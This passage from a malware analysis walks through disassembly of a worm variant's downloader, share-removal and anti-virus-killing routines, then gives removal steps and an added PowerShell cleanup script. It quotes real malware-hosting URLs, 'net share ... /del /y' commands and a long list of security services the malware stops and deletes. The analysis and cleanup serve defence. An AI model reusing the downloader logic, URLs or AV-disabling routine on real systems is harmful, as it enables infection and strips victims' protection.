CODE:0040C688 loc_40C688: ; DATA XREF: Download+24o
CODE:0040C688 jmp @System@@HandleAnyException$qqrv
CODE:0040C68D
CODE:0040C68D call @System@@DoneExcept$qqrv
CODE:0040C692
CODE:0040C692 loc_40C692: ; CODE XREF: Download+63j
CODE:0040C692 ; Download+20Ej
CODE:0040C692 xor eax, eax
CODE:0040C694 pop edx
CODE:0040C695 pop ecx
CODE:0040C696 pop ecx
CODE:0040C697 mov fs:[eax], edx
CODE:0040C69A push offset loc_40C6B4
CODE:0040C69F
CODE:0040C69F loc_40C69F: ; CODE XREF: j_@System@@HandleFinally$qqrv_34+5j
CODE:0040C69F lea eax, [ebp+var_3C]
CODE:0040C6A2 mov edx, 0Fh
CODE:0040C6A7 call @System@@LStrArrayClr$qqrpvi
CODE:0040C6AC retn
CODE:0040C6AC Download endp ; sp = 20h
CODE:0040C6AC
Here the virus connects over the network to http://www.ctv163.com/wuhan/down.txt, extracts from that page the addresses of the other trojans to fetch, then downloads and runs each trojan program. As the listing shows, the page text is cut at each "\r\n", every line is handed to URLDownloadToFileA and then WinExec, and if the page consists only of "QQ" the routine exits without downloading anything. When I tried it today, the trojan address the virus downloaded was http://www.chinanet123.cn/Class/about/image/images.jpg/2007qq.exe (thanks to 小崽娃 for helping download this file; a quick look after downloading showed it to be a QQ trojan).
After it runs, the virus also removes the default shares on the infected machine. Don't mistake this for a good deed: it only avoids the virus repeating its own work inside the LAN.
The share-removal code is as follows:
CODE:0040C754 ; SUBROUTINE
CODE:0040C754
CODE:0040C754 ; Attributes: bp-based frame
CODE:0040C754
CODE:0040C754 ; DWORD __stdcall Thread_Del_Local_Share(LPVOID)
CODE:0040C754 Thread_Del_Local_Share proc near ; DATA XREF: Download_and_KillShare+19o
CODE:0040C754
CODE:0040C754 var_C = dword ptr -0Ch
CODE:0040C754 var_8 = dword ptr -8
CODE:0040C754 var_4 = dword ptr -4
CODE:0040C754
CODE:0040C754 push ebp
CODE:0040C755 mov ebp, esp
CODE:0040C757 push 0
CODE:0040C759 push 0
CODE:0040C75B push 0
CODE:0040C75D push ebx
CODE:0040C75E xor eax, eax
CODE:0040C760 push ebp
CODE:0040C761 push offset j_@System@@HandleFinally$qqrv_35
CODE:0040C766 push dword ptr fs:[eax]
CODE:0040C769 mov fs:[eax], esp
CODE:0040C76C lea eax, [ebp+var_4]
CODE:0040C76F call GetValid_Root
CODE:0040C774 mov eax, [ebp+var_4]
CODE:0040C777 call unKnow
CODE:0040C77C mov ebx, eax
CODE:0040C77E cmp ebx, 1
CODE:0040C781 jl short loc_40C7C1
CODE:0040C783
CODE:0040C783 loc_40C783: ; CODE XREF: Thread_Del_Local_Share+6Bj
CODE:0040C783 push 0
CODE:0040C785 push offset aCmd_exeCNetSha ; "cmd.exe /c net share "
CODE:0040C78A lea eax, [ebp+var_C]
CODE:0040C78D mov edx, [ebp+var_4]
CODE:0040C790 mov dl, [edx+ebx-1]
CODE:0040C794 call @System@@LStrFromChar$qqrr17System@AnsiStringc
CODE:0040C799 push [ebp+var_C]
CODE:0040C79C push offset dword_40C81C ; uCmdShow
CODE:0040C7A1 lea eax, [ebp+var_8]
CODE:0040C7A4 mov edx, 3
CODE:0040C7A9 call @System@@LStrCatN$qqrv
CODE:0040C7AE mov eax, [ebp+var_8]
CODE:0040C7B1 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C7B6 push eax ; lpCmdLine
CODE:0040C7B7 call WinExec
CODE:0040C7BC dec ebx
CODE:0040C7BD test ebx, ebx
CODE:0040C7BF jnz short loc_40C783
CODE:0040C7C1
CODE:0040C7C1 loc_40C7C1: ; CODE XREF: Thread_Del_Local_Share+2Dj
CODE:0040C7C1 push 0 ; uCmdShow
CODE:0040C7C3 push offset CmdLine ; "cmd.exe /c net share admin$ /del /y"
CODE:0040C7C8 call WinExec
CODE:0040C7CD xor eax, eax
CODE:0040C7CF pop edx
CODE:0040C7D0 pop ecx
CODE:0040C7D1 pop ecx
CODE:0040C7D2 mov fs:[eax], edx
CODE:0040C7D5 push offset loc_40C7EF
CODE:0040C7DA
CODE:0040C7DA loc_40C7DA: ; CODE XREF: CODE:0040C7EDj
CODE:0040C7DA lea eax, [ebp+var_C]
CODE:0040C7DD mov edx, 3
CODE:0040C7E2 call @System@@LStrArrayClr$qqrpvi
CODE:0040C7E7 retn
CODE:0040C7E7 Thread_Del_Local_Share endp ; sp = 24h
CODE:0040C7E7
The virus removes the following default shares:
cmd.exe /c net share <drive letter>$ /del /y
cmd.exe /c net share admin$ /del /y
(This time the removal of the IPC$ connection seen in variant A is missing.)
Next we enter the last module, which removes anti-virus software; the code is as follows:
CODE:004070D4 ; SUBROUTINE
CODE:004070D4
CODE:004070D4
CODE:004070D4 ; DWORD __stdcall Kill_Av_Services(LPVOID)
CODE:004070D4 Kill_Av_Services proc near ; DATA XREF: Timer_kill_AV+6o
CODE:004070D4 mov eax, offset aSchedule ; "Schedule"
CODE:004070D9 call Stop_Service
CODE:004070DE mov eax, offset aSharedaccess ; "sharedaccess"
CODE:004070E3 call Stop_Service
CODE:004070E8 mov eax, offset aRsccenter ; "RsCCenter"
CODE:004070ED call Stop_Service
CODE:004070F2 mov eax, offset aRsravmon ; "RsRavMon"
CODE:004070F7 call Stop_Service
CODE:004070FC mov eax, offset aRsccenter_0 ; "RsCCenter"
CODE:00407101 call Del_Service
CODE:00407106 mov eax, offset aRsravmon_0 ; "RsRavMon"
CODE:0040710B call Del_Service
CODE:00407110 mov edx, offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00407115 mov eax, HKEY_LOCAL_MACHINE
CODE:0040711A call RegDelete
CODE:0040711F mov eax, offset aKvwsc ; "KVWSC"
CODE:00407124 call Stop_Service
CODE:00407129 mov eax, offset aKvsrvxp ; "KVSrvXP"
CODE:0040712E call Stop_Service
CODE:00407133 mov eax, offset aKvwsc_0 ; "KVWSC"
CODE:00407138 call Del_Service
CODE:0040713D mov eax, offset aKvsrvxp_0 ; "KVSrvXP"
CODE:00407142 call Del_Service
CODE:00407147 mov edx, offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:0040714C mov eax, HKEY_LOCAL_MACHINE
CODE:00407151 call RegDelete
CODE:00407156 mov eax, offset aKavsvc ; "kavsvc"
CODE:0040715B call Stop_Service
CODE:00407160 mov eax, offset aAvp ; "AVP"
CODE:00407165 call Stop_Service
CODE:0040716A mov eax, offset aAvp_0 ; "AVP"
CODE:0040716F call Del_Service
CODE:00407174 mov eax, offset aKavsvc_0 ; "kavsvc"
CODE:00407179 call Del_Service
CODE:0040717E mov edx, offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00407183 mov eax, HKEY_LOCAL_MACHINE
CODE:00407188 call RegDelete
CODE:0040718D mov edx, offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00407192 mov eax, HKEY_LOCAL_MACHINE
CODE:00407197 call RegDelete
CODE:0040719C mov eax, offset aMcafeeframewor ; "McAfeeFramework"
CODE:004071A1 call Stop_Service
CODE:004071A6 mov eax, offset aMcshield ; "McShield"
CODE:004071AB call Stop_Service
CODE:004071B0 mov eax, offset aMctaskmanager ; "McTaskManager"
CODE:004071B5 call Stop_Service
CODE:004071BA mov eax, offset aMcafeeframew_0 ; "McAfeeFramework"
CODE:004071BF call Del_Service
CODE:004071C4 mov eax, offset aMcshield_0 ; "McShield"
CODE:004071C9 call Del_Service
CODE:004071CE mov eax, offset aMctaskmanage_0 ; "McTaskManager"
CODE:004071D3 call Del_Service
CODE:004071D8 mov edx, offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:004071DD mov eax, HKEY_LOCAL_MACHINE
CODE:004071E2 call RegDelete
CODE:004071E7 mov edx, offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:004071EC mov eax, HKEY_LOCAL_MACHINE
CODE:004071F1 call RegDelete
CODE:004071F6 mov edx, offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:004071FB mov eax, 80000002h
CODE:00407200 call RegDelete
CODE:00407205 mov eax, offset aNavapsvc ; "navapsvc"
CODE:0040720A call Del_Service
CODE:0040720F mov eax, offset aWscsvc ; "wscsvc"
CODE:00407214 call Del_Service
CODE:00407219 mov eax, offset aKpfwsvc ; "KPfwSvc"
CODE:0040721E call Del_Service
CODE:00407223 mov eax, offset aSndsrvc ; "SNDSrvc"
CODE:00407228 call Del_Service
CODE:0040722D mov eax, offset aCcproxy ; "ccProxy"
CODE:00407232 call Del_Service
CODE:00407237 mov eax, offset aCcevtmgr ; "ccEvtMgr"
CODE:0040723C call Del_Service
CODE:00407241 mov eax, offset aCcsetmgr ; "ccSetMgr"
CODE:00407246 call Del_Service
CODE:0040724B mov eax, offset aSpbbcsvc ; "SPBBCSvc"
CODE:00407250 call Del_Service
CODE:00407255 mov eax, offset aSymantecCoreLc ; "SymantecCoreLC"
CODE:0040725A call Del_Service
CODE:0040725F mov eax, offset aNpfmntor ; "NPFMntor"
CODE:00407264 call Del_Service
CODE:00407269 mov eax, offset aMskservice ; "MskService"
CODE:0040726E call Del_Service
CODE:00407273 mov eax, offset aFiresvc ; "FireSvc"
CODE:00407278 call Del_Service
CODE:0040727D mov edx, offset aSoftwareMicr_8 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00407282 mov eax, HKEY_LOCAL_MACHINE
CODE:00407287 call RegDelete
CODE:0040728C mov edx, offset aSoftwareMicr_9 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00407291 mov eax, HKEY_LOCAL_MACHINE
CODE:00407296 call RegDelete
CODE:0040729B retn
CODE:0040729B Kill_Av_Services endp
CODE:0040729B
CODE:0040729B
What happens here is that the services of the relevant anti-virus products are stopped and deleted outright, so that after infection the anti-virus software can no longer work properly.
At this point the analysis of the virus is essentially complete; with the details laid out, I will not write a so-called summary.
Next, the removal of the virus.
【Solution】:
Removal method:
1. Close the network shares, or disconnect from the network.
2. Use Process Explorer to terminate the spoclsv.exe process, then delete every desktop_.ini file on the machine.
3. Use a tool such as msconfig to delete the svcshare entry.
4. Delete the autorun.inf and setup.exe files in the root of every drive.
5. Turn off the system's AutoPlay feature.
6. Delete the spoclsv.exe file in the Drivers directory.
7. Use a tool such as UltraEdit to remove the virus code from all script files.
8. After the cleanup, set a more complex logon password, then reboot and apply all system patches.
9. For this version, also update the QQ patch (this version uses a QQ vulnerability to spread).
That should remove the virus in most cases.
Now for immunization: for this variant you can take a rather extreme approach: create a "spoclsv.exe" file yourself in the Drivers directory, then set its permissions so that nobody is allowed to access or execute it.
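An added cleanup script, not from the original article, that carries out steps 2 through 6 and the immunization above using only the indicators this analysis lists (spoclsv.exe, the svcshare Run value, the CheckedValue switch, autorun.inf plus setup.exe in each drive root, and the 12-byte hidden Desktop_.ini marker). It assumes an elevated PowerShell 3.0 or later on the infected host after the network has been disconnected (step 1); the -DryRun switch, the helper name Remove-IfPresent and the NoDriveTypeAutoRun policy value used for step 5 are my choices, and steps 7, 8 and 9 stay manual.

```powershell
# Added example, not from the original article: automates removal steps 2-6 and the
# immunization trick using only the indicators the analysis lists for variant C.
# Assumptions: elevated PowerShell 3.0+ on the infected host, network already
# disconnected (step 1). Steps 7, 8 and 9 (script files, password, patches) remain manual.
param([switch]$DryRun)   # -DryRun only reports what would be changed

$driversDir = Join-Path $env:SystemRoot 'System32\drivers'
$virusExe   = Join-Path $driversDir 'spoclsv.exe'
$runKey     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$showAllKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$autoRunKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'

# Hypothetical helper: delete a file (hidden files included) unless -DryRun was given.
function Remove-IfPresent([string]$Path) {
    if (Test-Path -LiteralPath $Path) {
        Write-Host "removing $Path"
        if (-not $DryRun) { Remove-Item -LiteralPath $Path -Force }
    }
}

# Step 2: kill the process that poses as a system process (spoclsv.exe).
Get-Process -Name 'spoclsv' -ErrorAction SilentlyContinue | ForEach-Object {
    Write-Host "killing spoclsv.exe pid $($_.Id)"
    if (-not $DryRun) { Stop-Process -Id $_.Id -Force }
}

# Step 3: remove the "svcshare" autostart value the virus writes under HKCU\...\Run.
if (Get-ItemProperty -Path $runKey -Name 'svcshare' -ErrorAction SilentlyContinue) {
    Write-Host 'removing Run value svcshare'
    if (-not $DryRun) { Remove-ItemProperty -Path $runKey -Name 'svcshare' }
}

# Undo the CheckedValue change so "show hidden files" works again in Folder Options.
if (-not $DryRun) { Set-ItemProperty -Path $showAllKey -Name 'CheckedValue' -Type DWord -Value 1 }

# Steps 2 and 4: walk every drive except A: and B: (the virus never infects those).
$drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Name -notmatch '^[AB]$' }
foreach ($d in $drives) {
    # autorun.inf + setup.exe pair dropped in the drive root
    foreach ($name in 'autorun.inf', 'setup.exe') { Remove-IfPresent (Join-Path $d.Root $name) }
    # 12-byte hidden Desktop_.ini infection markers left in every infected folder
    Get-ChildItem -LiteralPath $d.Root -Filter 'Desktop_.ini' -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -eq 12 } |
        ForEach-Object { Remove-IfPresent $_.FullName }
}

# Step 6: delete the virus body ...
Remove-IfPresent $virusExe
# ... and immunize: re-create the name as an empty file that nobody may read or run
# (Everyone is addressed by SID S-1-1-0 so the ACL also applies on localized Windows).
if (-not $DryRun) {
    New-Item -Path $virusExe -ItemType File -Force | Out-Null
    icacls $virusExe /inheritance:r /deny '*S-1-1-0:(F)' | Out-Null
}

# Step 5: disable AutoRun for every drive type (0xFF) so autorun.inf cannot relaunch setup.exe.
if (-not $DryRun) {
    if (-not (Test-Path $autoRunKey)) { New-Item -Path $autoRunKey -Force | Out-Null }
    Set-ItemProperty -Path $autoRunKey -Name 'NoDriveTypeAutoRun' -Type DWord -Value 0xFF
}
Write-Host 'done; steps 7-9 (script files, password, patches) must still be done by hand'
```

Run it once with -DryRun first to review what would be deleted, since the Desktop_.ini match relies on the 12-byte length the article gives.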
Closing words: the main way this virus actually spreads is through web pages rigged with malware and through vulnerabilities.
If your system is reasonably well patched and you do not download software at random, the chance of infection is fairly low.
End of article.